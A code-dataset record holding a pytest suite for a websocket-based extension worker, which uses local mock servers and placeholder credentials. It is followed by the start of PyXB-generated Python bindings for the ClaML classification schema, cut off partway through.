tests/test_worker.py
|
gab832/connect-extension-runner
|
cd9a328f3a154df881170c0b2dd9480a94f0c4c2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_worker.py
|
gab832/connect-extension-runner
|
cd9a328f3a154df881170c0b2dd9480a94f0c4c2
|
[
"Apache-2.0"
] | null | null | null |
tests/test_worker.py
|
gab832/connect-extension-runner
|
cd9a328f3a154df881170c0b2dd9480a94f0c4c2
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import logging
import pytest
from websockets.exceptions import ConnectionClosedError, WebSocketException
from connect.eaas.dataclasses import (
CapabilitiesPayload,
ConfigurationPayload,
Message,
MessageType,
ResultType,
TaskCategory,
TaskPayload,
TaskType,
)
from connect.eaas.extension import Extension, ProcessingResponse
from connect.eaas.worker import Worker
from tests.utils import WSHandler
@pytest.mark.asyncio
async def test_capabilities_configuration(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = Message(
MessageType.CONFIGURATION,
ConfigurationPayload(
{
'var1': 'value1',
'var2': 'value2',
},
'token',
),
).to_json()
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send'],
)
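    # The third WSHandler argument (judging by how it is used across these
    # tests) is the ordered action script for the fake server: here it first
    # receives the worker's capabilities message, then sends back the
    # configuration payload prepared in data_to_send.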
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.1)
worker.run_event.clear()
await task
handler.assert_received(
Message(
MessageType.CAPABILITIES,
CapabilitiesPayload(
capabilities,
'https://example.com/README.md',
'https://example.com/CHANGELOG.md',
),
).to_json(),
)
@pytest.mark.asyncio
async def test_pr_task(mocker, ws_server, unused_port, httpx_mock):
pr_data = {'id': 'PR-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=f'https://127.0.0.1:{unused_port}/public/v1/requests/PR-000',
json=pr_data,
)
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
def process_asset_purchase_request(self, request):
assert request == pr_data
return ProcessingResponse.done()
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING,
'PR-000',
)).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send', 'receive'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
worker.run_event.clear()
await task
handler.assert_received(
Message(
MessageType.CAPABILITIES,
CapabilitiesPayload(
capabilities,
'https://example.com/README.md',
'https://example.com/CHANGELOG.md',
),
).to_json(),
)
handler.assert_received(
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING,
'PR-000',
result=ResultType.SUCCESS,
)).to_json(),
)
@pytest.mark.asyncio
async def test_tcr_task(mocker, ws_server, unused_port, httpx_mock):
tcr_data = {'id': 'TCR-000', 'status': 'pending'}
httpx_mock.add_response(
method='GET',
url=f'https://127.0.0.1:{unused_port}/public/v1/tier/config-requests/TCR-000',
json=tcr_data,
)
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING: ['pending'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
def process_tier_config_setup_request(self, request):
assert request == tcr_data
return ProcessingResponse.done()
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING,
'TCR-000',
)).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send', 'receive'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
worker.run_event.clear()
await task
handler.assert_received(
Message(
MessageType.CAPABILITIES,
CapabilitiesPayload(
capabilities,
'https://example.com/README.md',
'https://example.com/CHANGELOG.md',
),
).to_json(),
)
handler.assert_received(
Message(MessageType.TASK, TaskPayload(
'TQ-000',
TaskCategory.BACKGROUND,
TaskType.TIER_CONFIG_SETUP_REQUEST_PROCESSING,
'TCR-000',
result=ResultType.SUCCESS,
)).to_json(),
)
@pytest.mark.asyncio
async def test_pause(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.PAUSE).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
assert worker.paused is True
worker.run_event.clear()
await task
@pytest.mark.asyncio
async def test_resume(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.PAUSE).to_json(),
Message(MessageType.RESUME).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
assert worker.paused is False
worker.run_event.clear()
await task
@pytest.mark.asyncio
async def test_shutdown(mocker, ws_server, unused_port):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
data_to_send = [
Message(MessageType.CONFIGURATION, ConfigurationPayload(
{'var': 'val'}, 'api_key',
)).to_json(),
Message(MessageType.SHUTDOWN).to_json(),
]
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
data_to_send,
['receive', 'send', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.5)
assert worker.run_event.is_set() is False
@pytest.mark.asyncio
async def test_connection_closed_error(mocker, ws_server, unused_port, caplog):
mocker.patch('connect.eaas.worker.get_extension_class')
mocker.patch('connect.eaas.worker.get_extension_type')
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
None,
[],
)
async with ws_server(handler):
worker = Worker(secure=False)
worker.send = mocker.AsyncMock(side_effect=ConnectionClosedError(1006, 'disconnected'))
with caplog.at_level(logging.INFO):
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.1)
worker.run_event.clear()
await task
assert (
f'Disconnected from: ws://127.0.0.1:{unused_port}'
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002, retry in 1s'
) in caplog.text
@pytest.mark.asyncio
async def test_connection_websocket_exception(mocker, ws_server, unused_port, caplog):
mocker.patch('connect.eaas.worker.get_extension_class')
mocker.patch('connect.eaas.worker.get_extension_type')
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
None,
[],
)
async with ws_server(handler):
worker = Worker(secure=False)
worker.send = mocker.AsyncMock(side_effect=WebSocketException())
with caplog.at_level(logging.INFO):
task = asyncio.create_task(worker.run())
worker.run_event.set()
await asyncio.sleep(.1)
worker.run_event.clear()
await task
assert 'Unexpected websocket exception' in caplog.text
@pytest.mark.asyncio
async def test_start_stop(mocker, ws_server, unused_port, caplog):
mocker.patch(
'connect.eaas.worker.get_environment',
return_value={
'ws_address': f'127.0.0.1:{unused_port}',
'api_address': f'127.0.0.1:{unused_port}',
'api_key': 'SU-000:XXXX',
'environment_id': 'ENV-000-0001',
'instance_id': 'INS-000-0002',
},
)
capabilities = {
TaskType.ASSET_PURCHASE_REQUEST_PROCESSING: ['pending', 'inquiring'],
TaskType.ASSET_PURCHASE_REQUEST_VALIDATION: ['draft'],
}
class MyExtension(Extension):
@classmethod
def get_descriptor(cls):
return {
'capabilities': capabilities,
'readme_url': 'https://example.com/README.md',
'changelog_url': 'https://example.com/CHANGELOG.md',
}
mocker.patch('connect.eaas.worker.get_extension_class', return_value=MyExtension)
mocker.patch('connect.eaas.worker.get_extension_type', return_value='sync')
handler = WSHandler(
'/public/v1/devops/ws/ENV-000-0001/INS-000-0002',
None,
['receive', 'send'],
)
async with ws_server(handler):
worker = Worker(secure=False)
with caplog.at_level(logging.INFO):
await worker.start()
await asyncio.sleep(.1)
assert 'Control worker started' in caplog.text
worker.stop()
assert 'Control worker stopped' in caplog.text
| 31.077206
| 95
| 0.592926
| 1,829
| 16,906
| 5.285949
| 0.08748
| 0.034133
| 0.049235
| 0.06144
| 0.909806
| 0.903393
| 0.894187
| 0.889119
| 0.87681
| 0.868329
| 0
| 0.039534
| 0.27434
| 16,906
| 543
| 96
| 31.134438
| 0.748533
| 0
| 0
| 0.7473
| 0
| 0.006479
| 0.252691
| 0.113037
| 0
| 0
| 0
| 0
| 0.030238
| 1
| 0.019438
| false
| 0
| 0.017279
| 0.015119
| 0.071274
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df60b95a7baeb5b1681275e5d60fc4d441afe7bb
| 194,755
|
py
|
Python
|
python_claml/claml.py
|
thehyve/python_claml
|
60126f8cea2ec9aaf0e8292a584ac3316514e241
|
[
"MIT"
] | 7
|
2019-05-14T07:57:53.000Z
|
2021-06-07T08:00:04.000Z
|
python_claml/claml.py
|
thehyve/python_claml
|
60126f8cea2ec9aaf0e8292a584ac3316514e241
|
[
"MIT"
] | 1
|
2021-02-21T13:10:41.000Z
|
2021-02-21T13:10:41.000Z
|
python_claml/claml.py
|
thehyve/python_claml
|
60126f8cea2ec9aaf0e8292a584ac3316514e241
|
[
"MIT"
] | null | null | null |
# ./claml.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:e92452c8d3e28a9e27abfc9994d2007779e7f4c9
# Generated 2019-04-05 19:48:40.632175 by PyXB version 1.2.6 using Python 3.6.7.final.0
# Namespace AbsentNamespace0
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:0c295e4a-57cb-11e9-80c6-e86a649bf8c8')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import pyxb.binding.xml_
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.CreateAbsentNamespace()
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
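# A minimal usage sketch (file name hypothetical; kept as a comment so the
# generated module stays import-safe):
#
#     with open('classification.claml.xml', 'rb') as f:
#         root = CreateFromDocument(f.read())
#     print(root.version)  # 'version' attribute of the root ClaML element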
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.token, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 121, 16)
_Documentation = None
STD_ANON._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON, enum_prefix=None)
STD_ANON.true = STD_ANON._CF_enumeration.addEnumeration(unicode_value='true', tag='true')
STD_ANON.false = STD_ANON._CF_enumeration.addEnumeration(unicode_value='false', tag='false')
STD_ANON._InitializeFacetMap(STD_ANON._CF_enumeration)
_module_typeBindings.STD_ANON = STD_ANON
# Atomic simple type: [anonymous]
class STD_ANON_ (pyxb.binding.datatypes.token, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 194, 16)
_Documentation = None
STD_ANON_._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON_, enum_prefix=None)
STD_ANON_.true = STD_ANON_._CF_enumeration.addEnumeration(unicode_value='true', tag='true')
STD_ANON_.false = STD_ANON_._CF_enumeration.addEnumeration(unicode_value='false', tag='false')
STD_ANON_._InitializeFacetMap(STD_ANON_._CF_enumeration)
_module_typeBindings.STD_ANON_ = STD_ANON_
# Atomic simple type: [anonymous]
class STD_ANON_2 (pyxb.binding.datatypes.token, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 276, 16)
_Documentation = None
STD_ANON_2._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=STD_ANON_2, enum_prefix=None)
STD_ANON_2.item = STD_ANON_2._CF_enumeration.addEnumeration(unicode_value='item', tag='item')
STD_ANON_2.list = STD_ANON_2._CF_enumeration.addEnumeration(unicode_value='list', tag='list')
STD_ANON_2._InitializeFacetMap(STD_ANON_2._CF_enumeration)
_module_typeBindings.STD_ANON_2 = STD_ANON_2
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 24, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Variants uses Python identifier Variants
__Variants = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Variants'), 'Variants', '__AbsentNamespace0_CTD_ANON_Variants', False, pyxb.utils.utility.Location('ClaML.xsd', 41, 4), )
Variants = property(__Variants.value, __Variants.set, None, None)
# Element Meta uses Python identifier Meta
__Meta = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Meta'), 'Meta', '__AbsentNamespace0_CTD_ANON_Meta', True, pyxb.utils.utility.Location('ClaML.xsd', 53, 4), )
Meta = property(__Meta.value, __Meta.set, None, None)
# Element Identifier uses Python identifier Identifier
__Identifier = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Identifier'), 'Identifier', '__AbsentNamespace0_CTD_ANON_Identifier', True, pyxb.utils.utility.Location('ClaML.xsd', 60, 4), )
Identifier = property(__Identifier.value, __Identifier.set, None, None)
# Element Title uses Python identifier Title
__Title = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Title'), 'Title', '__AbsentNamespace0_CTD_ANON_Title', False, pyxb.utils.utility.Location('ClaML.xsd', 66, 4), )
Title = property(__Title.value, __Title.set, None, None)
# Element Authors uses Python identifier Authors
__Authors = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Authors'), 'Authors', '__AbsentNamespace0_CTD_ANON_Authors', False, pyxb.utils.utility.Location('ClaML.xsd', 73, 4), )
Authors = property(__Authors.value, __Authors.set, None, None)
# Element ClassKinds uses Python identifier ClassKinds
__ClassKinds = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds'), 'ClassKinds', '__AbsentNamespace0_CTD_ANON_ClassKinds', False, pyxb.utils.utility.Location('ClaML.xsd', 85, 4), )
ClassKinds = property(__ClassKinds.value, __ClassKinds.set, None, None)
# Element RubricKinds uses Python identifier RubricKinds
__RubricKinds = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds'), 'RubricKinds', '__AbsentNamespace0_CTD_ANON_RubricKinds', False, pyxb.utils.utility.Location('ClaML.xsd', 92, 4), )
RubricKinds = property(__RubricKinds.value, __RubricKinds.set, None, None)
# Element UsageKinds uses Python identifier UsageKinds
__UsageKinds = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds'), 'UsageKinds', '__AbsentNamespace0_CTD_ANON_UsageKinds', False, pyxb.utils.utility.Location('ClaML.xsd', 99, 4), )
UsageKinds = property(__UsageKinds.value, __UsageKinds.set, None, None)
# Element Modifier uses Python identifier Modifier
__Modifier = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Modifier'), 'Modifier', '__AbsentNamespace0_CTD_ANON_Modifier', True, pyxb.utils.utility.Location('ClaML.xsd', 142, 4), )
Modifier = property(__Modifier.value, __Modifier.set, None, None)
# Element ModifierClass uses Python identifier ModifierClass
__ModifierClass = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass'), 'ModifierClass', '__AbsentNamespace0_CTD_ANON_ModifierClass', True, pyxb.utils.utility.Location('ClaML.xsd', 154, 4), )
ModifierClass = property(__ModifierClass.value, __ModifierClass.set, None, None)
# Element Class uses Python identifier Class
__Class = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Class'), 'Class', '__AbsentNamespace0_CTD_ANON_Class', True, pyxb.utils.utility.Location('ClaML.xsd', 169, 4), )
Class = property(__Class.value, __Class.set, None, None)
# Attribute version uses Python identifier version
__version = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'version'), 'version', '__AbsentNamespace0_CTD_ANON_version', pyxb.binding.datatypes.anySimpleType, required=True)
__version._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 38, 12)
__version._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 38, 12)
version = property(__version.value, __version.set, None, None)
_ElementMap.update({
__Variants.name() : __Variants,
__Meta.name() : __Meta,
__Identifier.name() : __Identifier,
__Title.name() : __Title,
__Authors.name() : __Authors,
__ClassKinds.name() : __ClassKinds,
__RubricKinds.name() : __RubricKinds,
__UsageKinds.name() : __UsageKinds,
__Modifier.name() : __Modifier,
__ModifierClass.name() : __ModifierClass,
__Class.name() : __Class
})
_AttributeMap.update({
__version.name() : __version
})
_module_typeBindings.CTD_ANON = CTD_ANON
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 42, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element Variant uses Python identifier Variant
__Variant = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Variant'), 'Variant', '__AbsentNamespace0_CTD_ANON__Variant', True, pyxb.utils.utility.Location('ClaML.xsd', 48, 4), )
Variant = property(__Variant.value, __Variant.set, None, None)
_ElementMap.update({
__Variant.name() : __Variant
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_ = CTD_ANON_
# Complex type [anonymous] with content type MIXED
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type MIXED"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_MIXED
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 49, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_2_name', pyxb.binding.datatypes.ID, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 50, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 50, 12)
name = property(__name.value, __name.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name
})
_module_typeBindings.CTD_ANON_2 = CTD_ANON_2
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_3 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 54, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute name uses Python identifier name
__name = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'name'), 'name', '__AbsentNamespace0_CTD_ANON_3_name', pyxb.binding.datatypes.anySimpleType, required=True)
__name._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 55, 12)
__name._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 55, 12)
name = property(__name.value, __name.set, None, None)
# Attribute value uses Python identifier value_
__value = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'value'), 'value_', '__AbsentNamespace0_CTD_ANON_3_value', pyxb.binding.datatypes.anySimpleType, required=True)
__value._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 56, 12)
__value._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 56, 12)
value_ = property(__value.value, __value.set, None, None)
# Attribute variants uses Python identifier variants
__variants = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'variants'), 'variants', '__AbsentNamespace0_CTD_ANON_3_variants', pyxb.binding.datatypes.IDREFS)
__variants._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 57, 12)
__variants._UseLocation = pyxb.utils.utility.Location('ClaML.xsd', 57, 12)
variants = property(__variants.value, __variants.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__name.name() : __name,
__value.name() : __value,
__variants.name() : __variants
})
_module_typeBindings.CTD_ANON_3 = CTD_ANON_3
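
# Editorial note: the XML attribute is named 'value', but the binding exposes
# it as 'value_' (see the AttributeUse above); PyXB de-conflicts identifiers
# that would shadow names already used by the binding classes by appending a
# trailing underscore. Sketch, with `m` assumed to be a CTD_ANON_3 instance:
#
#   m.name, m.value_, m.variants   # variants is optional (IDREFS)
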
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('ClaML.xsd', 61, 8)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute authority uses Python identifier authority
__authority = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'authority'), 'authority', '__AbsentNamespace0_CTD_ANON_4_authority', pyxb.binding.datatypes.NMTOKEN)
__authority._DeclarationLocation = pyxb.utils.utility.Location('ClaML.xsd', 62, 12)
